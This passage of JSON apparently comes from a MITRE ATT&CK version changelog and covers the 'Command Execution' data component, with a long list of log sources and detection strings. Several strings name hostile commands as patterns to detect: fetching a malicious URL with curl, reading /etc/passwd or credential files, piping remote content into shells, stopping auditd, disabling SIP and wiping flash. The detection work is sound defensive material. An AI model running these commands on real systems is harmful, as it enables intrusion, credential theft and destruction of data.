                            "channel": "EventCode=4769, 1200, 1202"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4768, 4769, 4770"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4769"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4776, 4625"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4625, 4771, 4648"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4648"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:47:33.610000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][92]\": {\"name\": \"saas:MDM\", \"channel\": \"Authentication events to device management or enterprise mobility management consoles\"}, \"root['x_mitre_log_sources'][93]\": {\"name\": \"saas:MDM\", \"channel\": \"Authentication events to Apple iCloud or enterprise device management services\"}, \"root['x_mitre_log_sources'][98]\": {\"name\": \"saas:okta\", \"channel\": \"user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                }
            ],
            "minor_version_changes": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-24 19:47:16.123000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0064",
                            "external_id": "DC0064"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Command Execution",
                    "description": "Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples: \n\n- Windows Command Prompt\n    - dir \u2013 Lists directory contents.\n    - net user \u2013 Queries or manipulates user accounts.\n    - tasklist \u2013 Lists running processes.\n- PowerShell\n    - Get-Process \u2013 Retrieves processes running on a system.\n    - Set-ExecutionPolicy \u2013 Changes PowerShell script execution policies.\n    - Invoke-WebRequest \u2013 Downloads remote resources.\n- Linux Shell\n    - ls \u2013 Lists files in a directory.\n    - cat /etc/passwd \u2013 Reads the user accounts file.\n    - curl http://malicious-site.com \u2013 Retrieves content from a malicious URL.\n- Container Environments\n    - docker exec \u2013 Executes a command inside a running container.\n    - kubectl exec \u2013 Runs commands in Kubernetes pods.\n- macOS Terminal\n    - open \u2013 Opens files or URLs.\n    - dscl . -list /Users \u2013 Lists all users on the system.\n    - osascript -e \u2013 Executes AppleScript commands.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "android:logcat",
                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "udev rule reload or trigger command executed"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Use of mv or cp to rename files with '.' prefix"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve: Execution of update-ca-certificates or trust anchor modification commands"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "gcore, gdb, strings, hexdump execution"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of auditctl, systemctl stop auditd, or kill -9 auditd"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of systemctl with subcommands start, stop, enable, disable"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of GUI-related binaries with suppressed window/display flags"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -X POST, wget --post-data"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "command line arguments containing lsblk, fdisk, parted"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -d, wget --post-data"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "grep/cat/awk on files with password fields"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "git push, curl -X POST"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of gsettings set org.gnome.login-screen disable-user-list true"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of setfattr or getfattr commands"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Process execution of update-ca-certificates or openssl with suspicious arguments"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of chattr to set +i or +a attributes"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl or wget with POST/PUT options"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -T, rclone copy"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "process title records containing discovery command sequences and environmental assessment patterns"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of realmd, samba-tool, or ldapmodify with user-related arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of script interpreters by systemd timer (ExecStart)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands like systemctl stop <service>, service <service> stop, or kill -9 <pid>"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to locale, timedatectl, or cat /etc/timezone"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sleep function usage or loops (nanosleep, usleep) in scripts"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect, execve, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call including 'nohup' or trailing '&'"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands executed within an SSH session where no matching logon/authentication event exists"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, execve"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: iptables, nft, firewall-cmd modifications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Invocation of scp, rsync, curl, or sftp"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls modifying local mail filter configuration files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: process_name IN (\"virsh\", \"VBoxManage\", \"qemu-img\") AND command IN (\"list\", \"info\")"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: openssl pkcs12, certutil, keytool"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of systemctl or service with enable/start parameters"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of python, perl, or custom binaries invoking compression libraries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, USER_CMD"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "bash/zsh of base64, tar, gzip, or openssl immediately after file write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Processes executing sendmail/postfix with forged headers"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "promiscuous mode transitions (ioctl or ifconfig)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chattr, rm, shred, dd run on recovery directories or partitions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of downgraded interpreters such as python2 or forced fallback commands"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Command line arguments including SPApplicationsDataType"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of tools like cat, grep, or awk on credential files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of curl, rsync, wget with internal knowledge base or IPs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of xev, xdotool, or input activity emulators"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of interpreters creating archive-like outputs without calling tar/gzip"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of curl, wget, or custom scripts accessing financial endpoints"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of tar, gzip, bzip2, or openssl with output redirection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve=/sbin/shutdown or /sbin/reboot"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls modifying HISTFILE or HISTCONTROL via unset/export"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to /usr/bin/locale or shell execution of $LANG"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of systemctl or service with enable/start/modify"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of lsmod, modinfo, or cat /proc/modules"
                        },
                        {
                            "name": "auditd:USER_CMD",
                            "channel": "USER_CMD"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeFunction"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SSM RunCommand"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetLogEvents: High frequency log exports from CloudWatch or equivalent services"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "command-line execution invoking credential enumeration"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ssm:GetCommandInvocation"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "Intune PowerShell Scripts"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain"
                        },
                        {
                            "name": "Command",
                            "channel": "None"
                        },
                        {
                            "name": "docker:api",
                            "channel": "docker logs access or container inspect commands from non-administrative users"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "docker exec or docker run with unexpected command/entrypoint"
                        },
                        {
                            "name": "docker:events",
                            "channel": "container exec rm|container stop --force"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "useradd or /etc/passwd modified inside container"
                        },
                        {
                            "name": "EDR:AMSI",
                            "channel": "None"
                        },
                        {
                            "name": "EDR:cli",
                            "channel": "Command Line Telemetry"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "command execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "modification of config files or shell command execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "shell access or job registration"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "logline inspection"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "esxcli network firewall set commands"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "event stream"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "scp/ssh used to move file across hosts"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "esxcli system syslog config set or reload"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "command log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Command Execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "remote CLI + vim-cmd logging"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "execution + payload hints"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "snapshot create/copy, esxcli"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "interactive shell"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "invoked remote scripts (esxcli)"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "base64 or gzip use within shell session"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "scripts or binaries with misleading names"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log entries containing \"esxcli system clock get\""
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "command IN (\"esxcli vm process list\", \"vim-cmd vmsvc/getallvms\")"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "openssl|tar|dd"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "CLI usage logs"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Command execution trace"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell command execution for chmod, chown, or file permission modification on VMFS or system files"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system syslog config set --loghost='' or stopping hostd service"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Shell Access/Command Execution"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli software vib list"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/root/.ash_history"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "mv, rename, or chmod commands moving VM files into hidden directories"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "`esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "CLI session activity"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system shutdown or reboot invoked"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "unset HISTFILE or HISTFILESIZE modifications"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "boot logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "DCUI shell start, BusyBox activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "esxcli system account add"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Unexpected restarts of management agents or shell access"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "esxcli, vim-cmd invocation"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "shell session start"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "vCenter Management"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file system activity monitor"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "access to BPF devices or interface IOCTLs"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "None"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "methodName: setIamPolicy, startInstance, createServiceAccount"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "process execution involving curl, grep, or awk on secrets"
                        },
                        {
                            "name": "linus:syslog",
                            "channel": "None"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "command logging"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "Shell history logs"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "Terminal Command History"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "/home/*/.bash_history"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Command-line includes base64 -d or openssl enc -d"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events.command_line"
                        },
                        {
                            "name": "linux:shell",
                            "channel": "Manual invocation of software enumeration commands via interactive shell"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "cron activity"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Suspicious script or command execution targeting browser folders"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unusual outbound transfers from CLI tools like base64, gzip, or netcat"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo chage|grep pam_pwquality|cat /etc/login.defs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "CLI access to 'show running-config', 'show password', or 'cat config.txt'"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Sudo or root escalation followed by filesystem mount commands"
                        },
                        {
                            "name": "linuxsyslog",
                            "channel": "nslcd or winbind logs"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "Activity Log: Command Invocation"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Cmdlet: Get-GlobalAddressList, Get-Recipient"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Get-RoleGroup, Get-DistributionGroup"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email triggers execution of mailbox-stored custom form"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email matches crafted rule trigger pattern tied to persistence logic"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email triggering Outlook to auto-access folder tied to malicious Home Page"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Startup execution includes non-default component"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Execution of unsigned macro from template"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Automated forwarding or file sync initiated by a logic app"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Search-Mailbox, Get-MessageTrace, eDiscovery requests"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, New-InboxRule"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Interpreter exec with suspicious arguments as above"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd + process_events"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "system.log"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "/var/log/system.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dsconfigad or dscl with create or append options for AD-bound users"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl unload, kill, or pkill commands affecting daemons or background services"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security-agent detection or enumeration commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of chflags hidden or SetFile -a V"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults read -g AppleLocale, systemsetup -gettimezone"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "profiles install -type=configuration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'eventMessage contains \"loginwindow\" or \"pfctl\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or sudo usage with NOPASSWD context or echo modifying sudoers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "nohup, disown, or osascript execution patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of 'profiles install -type=configuration'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem:com.apple.Terminal"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "base64 or curl processes chained within short execution window"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "chmod command with arguments including '+s', 'u+s', or numeric values 4000\u20136777"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command includes dscl . delete or sysadminctl --deleteUser"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DS daemon log entries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil eraseDisk / asr restore with destructive flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pwpolicy|PasswordPolicy"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line contains smbutil view //, mount_smbfs //"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log messages related to disk enumeration context or Terminal session"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults write com.apple.system.logging or logd manipulation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process calling security find-certificate, export, or import"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of log show, fs_usage, or cat targeting system.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of launchctl load/unload/start commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "base64 -d or osascript invoked on staged file"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil partitionDisk or eraseVolume with partition scheme modifications"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "grep/cat on files matching credential patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil eraseDisk/zeroDisk or asr restore with destructive flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: at, job runner"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of dscl . create with IsHidden=1"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'processImagePath contains \"zip\" OR \"base64\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr utility execution with -w or -p flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of 'security', 'cat', or 'grep' commands accessing credential storage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl load or boot-time plist registration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dscl -create"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "kextload execution from Terminal or suspicious paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr -d com.apple.quarantine or similar removal commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Security framework operations including keychain access, cryptographic operations, and certificate validation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of chflags hidden or setfile -a V"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:spawn, process:exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "csrutil disable"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log show --predicate 'process == <utility>'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command execution triggered by emond (e.g., shell, curl, python)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Set or unset HIST* variables in shell environment"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults read -g AppleLocale or systemsetup -gettimezone"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl load/unload or plist file modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dscl . -create"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "CLI command"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Policy Update"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "ip ssh pubkey-chain"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "erase flash:, erase startup-config, format disk"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "CLI command logs"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "cmd: cmd=show clock detail"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "None"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands like 'show running-config', 'copy running-config', or 'export config'"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "format flash:, format disk, reformat commands"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "erase flash:, erase nvram:, format disk"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "command logs"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "command logging"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Interface commands"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "shell command"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Commands like 'no logging' or equivalents that disable session history"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands such as 'copy tftp flash', 'boot system <image>', 'reload'"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "PKI export or certificate manipulation commands"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers"
                        },
                        {
